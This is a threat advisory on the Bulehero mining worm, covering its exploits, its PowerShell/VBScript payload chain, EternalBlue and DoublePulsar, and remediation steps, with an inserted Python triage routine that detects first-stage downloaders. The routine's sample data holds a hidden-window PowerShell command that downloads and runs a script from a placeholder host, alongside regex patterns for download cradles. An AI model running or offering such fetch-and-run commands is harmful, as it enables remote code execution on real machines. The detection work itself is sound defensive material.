Bulehero Cryptocurrency Mining Worm

Summary

First observed in May 2018, Bulehero is a cryptocurrency mining worm and botnet that uses living-off-the-land techniques to compromise devices and avoid security systems.


Threat details

The group operating Bulehero uses a number of known exploits to compromise vulnerable web servers. Once they have gained access, they execute PowerShell or VBScript scripts to download and install a primary payload. This payload creates a hidden process to gain persistence before downloading a secondary payload.

This second payload contains versions of the EternalBlue exploit and DoublePulsar backdoor, and can also carry out brute-force attacks against other devices. If either method succeeds, Bulehero downloads a new copy of the primary payload to the newly affected device.
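As an added example that is not part of this advisory, the following Python triage routine applies the first-stage behaviour described above to constructed Sysmon-style process-creation events: it flags a script engine launched by a web-server process, a download cradle in the command line, and a hidden-window request. The parent and engine lists, the regular expressions and the sample events are assumptions made for illustration.

```python
import re
from typing import Dict, List, Tuple

# Assumed lists: web-server processes a web exploit would run code under, and the
# script engines the advisory names (PowerShell, VBScript) plus close relatives.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "tomcat.exe", "php-cgi.exe", "nginx.exe"}
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Common download-cradle markers and the PowerShell hidden-window switch (-w/-win/-windowstyle).
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|xmlhttp|https?://", re.I)
HIDDEN_RE = re.compile(r"-w\w*\s+hidden", re.I)

# Constructed sample events, not real telemetry; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventId": "1", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/a.ps1')\""},
    {"EventId": "2", "ParentImage": r"C:\Program Files\Apache\httpd.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "wscript //B C:\\inetpub\\temp\\dl.vbs"},
    {"EventId": "3", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Service"},
    {"EventId": "4", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": "cscript //nologo C:\\Scripts\\logon.vbs"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like a first-stage script downloader (empty if none)."""
    parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image not in SCRIPT_ENGINES:
        return reasons  # only script-engine launches are of interest here
    if parent in WEB_SERVER_PARENTS:
        reasons.append(f"{image} spawned by web server process {parent}")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download cradle in command line")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (EventId, reasons) for every event that triggered at least one rule."""
    return [(e["EventId"], r) for e in events if (r := score_event(e))]
```

Event 2 is caught by the parent/child rule alone, which matters because the cradle may live inside the script file rather than on the command line.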

For further information:


Remediation steps

Users and administrators are encouraged to review SMB EternalBlue and DoublePulsar Exploit CC-1353 and apply the necessary updates immediately if they have not already done so.

To prevent and detect a trojan infection, ensure that:

  • A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
  • All operating systems, anti-virus and other security products are kept up-to-date.
  • Regular anti-virus and security scans are performed on your organisation’s estate.
  • All day-to-day computer activities such as email and internet are performed using non-administrative accounts.
  • Strong password policies are in place.
  • Network, proxy and firewall logs are monitored for suspicious activity.
  • User accounts accessed from affected devices are reset on a clean computer.
  • Your organisation adopts a holistic all-round approach to Cyber Security as advocated by the 10 Steps to Cyber Security.


Last edited: 11 January 2022 9:43 am